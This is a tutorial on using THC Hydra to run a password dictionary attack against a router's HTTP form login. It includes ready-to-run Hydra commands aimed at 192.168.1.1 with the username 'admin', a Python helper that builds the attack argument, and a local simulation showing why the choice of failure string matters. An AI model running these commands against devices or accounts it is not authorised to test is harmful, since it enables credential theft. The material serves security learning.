THC Hydra - Dictionary Attack
Hydra is an open-source network logon cracker released by THC (The Hacker's Choice). It performs what is known as a dictionary attack: it tries candidate passwords from a word list against a live service, so it is an online cracker, paced by the target and by any lockout or rate limit the target enforces.
Dictionary attack definition from http://lastbit.com/
Dictionary Attack uses a dictionary. Password Crackers will try every word from the dictionary as a password. A good dictionary (also known as a word list) is more than just a dictionary, e.g. you will not find the word "qwerty" in an ordinary dictionary but it will surely be included in a good word list. Indeed, this combination of characters is commonly used as a password.
I will give an example of how you would use hydra to crack a password-protected web page that uses HTML form authentication, the kind of login page a home router presents.
I will only cover HTTP form authentication, as it is the more complicated case. For cracking other protocols, check hydra's help page by running hydra without any parameters.
First, look at the HTML source of the login page, specifically the form the user fills in to log in to the service. For my corega router's login page it looks like this:
<FORM name=theform id=theform action="/auth/logining.php" method=post>
<TABLE height="75%" cellSpacing=0 cellPadding=0 width="100%" border=0>
<TBODY>
<TR>
<TD vAlign=center align=middle height=400>
<DIV align=center><BR><BR>
<!--TABLE cellSpacing=1 cellPadding=5 border=1 bordercolor=#ff9933 bgcolor=#ffffb3-->
<TABLE cellSpacing=1 cellPadding=5 border=1 bordercolor=#ff9933 bgcolor=#ffffcc>
<TBODY>
<TR>
<TD>
<TABLE cellSpacing=0 cellPadding=5 width=250 border=0>
<TBODY>
<TR>
<TD class=tdTextc noWrap><B>Username :</B></TD>
<TD class=txt1><INPUT maxLength=12 size=18 name=user></TD></TR>
<TR>
<TD class=tdTextc noWrap><B>Password :</B></TD>
<TD class=txt1><INPUT type=password maxLength=12 size=18 name=password></TD>
</TR>
</TBODY>
</TABLE>
</TD>
</TR>
<TR>
<TD align=center>
<INPUT type=submit value="Submit" onclick="return login()">
<INPUT type=reset value="Reset" name=Close>
</TD>
</TR>
There is more than one authentication method over HTTP. The line <FORM name=theform id=theform action="/auth/logining.php" method=post> tells us this router page uses form authentication with the POST method, and that the credentials are sent to the page "/auth/logining.php".
We need the page that checks the credentials, which is taken from the "action" attribute of the form. We also need the names of the variables sent to that page, which come from the input elements, in this case <INPUT maxLength=12 size=18 name=user> and <INPUT type=password maxLength=12 size=18 name=password>, so the fields are named "user" and "password". Any hidden input in the form (for example a session token) would have to be sent as well; this form has none.
We also need a unique phrase from a failed login attempt so that Hydra can tell a failed attempt from a successful one. Submit a wrong password and look at the source of the page you get back, which looks like this:
<html>
<head>
<title>Login error</title>
<meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
<link rel="stylesheet" href="Page.css">
<script language="JavaScript">
if (parent.location.href != window.location.href)
parent.location.href = window.location.href;
</script></head>
<BODY bgcolor="#FFFFFF" leftmargin="0" topmargin="0">
<form name="tF" id=tF>
<table width="100%" border="0" cellspacing="0" cellpadding="0" height="75%">
<tr>
<td valign="middle" align="center" height="400">
<div align="center"><br><br>
<table border="1" cellspacing="1" cellpadding="5">
<tr>
<td>
<table border="0" cellspacing="0" cellpadding="5" width=250 bgcolor="#FFFFFF">
<tr>
<td nowrap class=tdTextc colspan=2><font color=#FF0000><b>Login Error.</b></td>
</tr>
<tr>
<td nowrap class=tdTextc colspan=2><font color=#FF0000><b>Invalid username or password.</b></td>
</tr>
</table>
</td>
</tr>
<p>
<tr>
<td align=center>
<INPUT onClick="javascript:self.location.href='login.php'" type="button" value="Back">
</td>
</tr>
<p>
</table>
</div>
</td>
</tr>
</table>
</form>
</body>
</html>
We could use <title>Login error</title> as the unique phrase, since it appears in the error page and not in the page shown after a successful login.
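The extraction described above can be scripted. The following Python is an added example written for this article, not code from Hydra or from the router: it parses a copy of the router's login form (embedded below, trimmed to the form itself), reads the action, the method and the input names, and assembles the http-post-form module argument in the shape hydra expects. The failure string is passed in by hand, because it comes from the error page rather than from the form.

```python
"""Extract hydra http-post-form parameters from a login page.

Added example, not part of the original article or of Hydra. Given the HTML of
a login form it pulls out what the article tells you to find by hand (the
action URL, the method and the names of the text/password inputs) and builds
"<path>:<user_field>=^USER^&<pass_field>=^PASS^:<failure_string>".
The sample HTML below is a trimmed copy of the article's router form.
"""
from html.parser import HTMLParser

LOGIN_FORM_HTML = """
<FORM name=theform id=theform action="/auth/logining.php" method=post>
<TABLE><TR>
<TD class=tdTextc noWrap><B>Username :</B></TD>
<TD class=txt1><INPUT maxLength=12 size=18 name=user></TD></TR>
<TR><TD class=tdTextc noWrap><B>Password :</B></TD>
<TD class=txt1><INPUT type=password maxLength=12 size=18 name=password></TD></TR>
<TR><TD><INPUT type=submit value="Submit" onclick="return login()">
<INPUT type=reset value="Reset" name=Close></TD></TR>
</TABLE></FORM>
"""


class LoginFormParser(HTMLParser):
    """Collects the first <form> on the page and the <input> elements inside it."""

    def __init__(self):
        super().__init__()
        self.action = None
        self.method = "get"      # HTML default when the method attribute is omitted
        self.inputs = []         # (name, type, value) in document order
        self._in_form = False

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)      # html.parser lowercases tag and attribute names
        if tag == "form" and self.action is None:
            self._in_form = True
            self.action = attrs.get("action", "")
            self.method = (attrs.get("method") or "get").lower()
        elif tag == "input" and self._in_form:
            self.inputs.append((attrs.get("name"),
                                (attrs.get("type") or "text").lower(),
                                attrs.get("value")))

    def handle_endtag(self, tag):
        if tag == "form":
            self._in_form = False


def extract_form(html):
    """Parse the page and return the populated LoginFormParser."""
    parser = LoginFormParser()
    parser.feed(html)
    parser.close()
    return parser


def hydra_post_form_arg(html, failure_string):
    """Build the http-post-form module string, or raise if the form is unusable."""
    form = extract_form(html)
    if form.method != "post":
        raise ValueError("form uses %s, not post; use http-get-form instead" % form.method)
    user_field = next(n for n, t, _ in form.inputs if t == "text" and n)
    pass_field = next(n for n, t, _ in form.inputs if t == "password" and n)
    # Hidden fields (tokens and the like) must be sent too; carry their static values.
    extras = "".join("&%s=%s" % (n, v or "") for n, t, v in form.inputs if t == "hidden" and n)
    # Hydra separates the three parts with ':', so a colon inside the phrase is escaped as '\:'.
    return "%s:%s=^USER^&%s=^PASS^%s:%s" % (
        form.action, user_field, pass_field, extras, failure_string.replace(":", "\\:"))


if __name__ == "__main__":
    print(hydra_post_form_arg(LOGIN_FORM_HTML, "<title>Login error</title>"))
```

Run it and the printed string is exactly the module argument used in the hydra command below; on a form with hidden inputs they are appended with their fixed values, and a GET form is rejected so you know to switch to http-get-form.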
The command to use hydra for this case:
hydra -V -l [username] -P [password_list] [host] http-post-form "[target_page]:[username_variable_name]=^USER^&[password_variable_name]=^PASS^:[unique_phrase]"
where:
[username] = username to be used (or use -L instead to specify a text file with one username per line)
[password_list] = password list file to be used, one password per line
[host] = ip/hostname of the host machine (e.g. 192.168.1.1)
[target_page] = the page that performs the authentication check, taken from the form's "action"
[username_variable_name] = the name of the form field that carries the username; hydra replaces ^USER^ with each username tried
[password_variable_name] = the name of the form field that carries the password; hydra replaces ^PASS^ with each candidate password
[unique_phrase] = the string that appears in the response only when the login fails; hydra counts an attempt as successful when this string is absent from the response (prefix the phrase with S= to match a success string instead)
-V makes hydra print every login/password pair as it is tried. The three parts of the module argument are separated by colons, so a colon inside the unique phrase has to be escaped as \:.
After filling in all those parameters, it would look like: hydra -V -l admin -P dictionary.txt 192.168.1.1 http-post-form "/auth/logining.php:user=^USER^&password=^PASS^:<title>Login error</title>"
But this would not work for the corega router. The "Login error" page we see in the browser is only reached after a redirect, and hydra checks the response to the POST itself, which here is just the redirect and does not contain <title>Login error</title>; with that phrase as the failure string, hydra would report the very first password it tries as valid. Instead, use a phrase that is present in the redirect response, url=/auth/loginpserr.php, so hydra can recognise the failed attempt. Finding the response that precedes the redirection is not covered in detail here; network sniffing, an intercepting proxy, or a client that does not follow redirects (curl without -L, with -v to show the headers) will all show it.
The actual command would be:
hydra -V -l admin -P dictionary.txt 192.168.1.1 http-post-form "/auth/logining.php:user=^USER^&password=^PASS^:url=/auth/loginpserr.php"
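To see why the browser-visible error text fails as a unique phrase while the redirect string works, here is an added Python simulation; it is not part of the article and not Hydra's code. It runs a mock router in a thread whose bad-login response is a 302 carrying a meta refresh to /auth/loginpserr.php, then applies the http-post-form rule with both phrases: one POST per candidate, redirects not followed, an attempt counted as failed only if the phrase appears somewhere in the raw response (status line, headers or body). The router, its paths, the wordlist and the password letmein are all constructed for the demo.

```python
"""Simulated http-post-form attack against a mock router login.

Added example, not part of the original article or of Hydra. It reproduces the
check Hydra's http-post-form module applies: POST one candidate per request, do
NOT follow redirects, and treat the attempt as failed only if the failure string
appears in the raw response. Everything here (router, paths, wordlist, password)
is constructed for the demo.
"""
import http.client
import threading
import urllib.parse
from http.server import BaseHTTPRequestHandler, HTTPServer

VALID_USER = "admin"
VALID_PASS = "letmein"                      # constructed secret for the mock router
LOGIN_PATH = "/auth/logining.php"
ERROR_PATH = "/auth/loginpserr.php"
# What the browser shows after following the redirect. Hydra never requests it.
ERROR_PAGE = b"<html><head><title>Login error</title></head><body>Invalid username or password.</body></html>"


class MockRouter(BaseHTTPRequestHandler):
    """A bad login answers with a redirect to the error page, not the error page itself."""

    def _reply(self, status, body, location=None):
        self.send_response(status)
        if location:
            self.send_header("Location", location)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        fields = urllib.parse.parse_qs(self.rfile.read(length).decode())
        user = fields.get("user", [""])[0]
        password = fields.get("password", [""])[0]
        if user == VALID_USER and password == VALID_PASS:
            self._reply(200, b"<html><body>Welcome to the router setup</body></html>")
        else:
            # The redirect instruction carries the string the article matches on.
            body = ('<html><head><meta http-equiv="refresh" content="0; url=%s">'
                    '</head></html>' % ERROR_PATH).encode()
            self._reply(302, body, location=ERROR_PATH)

    def do_GET(self):
        self._reply(200, ERROR_PAGE)

    def log_message(self, *args):           # keep the demo output quiet
        pass


def post_raw(host, port, path, data):
    """POST without following redirects; return status line + headers + body as text."""
    conn = http.client.HTTPConnection(host, port, timeout=5)
    conn.request("POST", path, body=urllib.parse.urlencode(data),
                 headers={"Content-Type": "application/x-www-form-urlencoded"})
    resp = conn.getresponse()
    raw = "HTTP/1.1 %d %s\r\n" % (resp.status, resp.reason)
    raw += "".join("%s: %s\r\n" % kv for kv in resp.getheaders())
    raw += "\r\n" + resp.read().decode(errors="replace")
    conn.close()
    return raw


def dictionary_attack(host, port, user, wordlist, failure_string):
    """Return the first password whose response does NOT contain failure_string.

    This is the http-post-form rule: absence of the failure string means success,
    so a string that is never present yields a false positive on the first word.
    """
    for candidate in wordlist:
        raw = post_raw(host, port, LOGIN_PATH, {"user": user, "password": candidate})
        if failure_string not in raw:
            return candidate
    return None


def run_demo(wordlist=("123456", "password", "letmein", "qwerty")):
    """Start the mock router on an ephemeral port and try both failure strings."""
    server = HTTPServer(("127.0.0.1", 0), MockRouter)
    port = server.server_address[1]
    threading.Thread(target=server.serve_forever, daemon=True).start()
    try:
        results = {}
        for phrase in ("<title>Login error</title>", "url=" + ERROR_PATH):
            results[phrase] = dictionary_attack("127.0.0.1", port, "admin", wordlist, phrase)
    finally:
        server.shutdown()
        server.server_close()
    return results


if __name__ == "__main__":
    for phrase, found in run_demo().items():
        print("failure string %-28r -> reported password %r" % (phrase, found))
```

With the browser-visible phrase the first word in the list is reported as the password, because the 302 response never contains it; with the phrase taken from the redirect only the real password produces a response without it. The same false-positive pattern (every attempt "succeeds") is what you see from hydra when the failure string is wrong, so check a single known-bad password by hand before trusting a hit.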
More information on other password crackers can be found at http://sectools.org/crackers.html
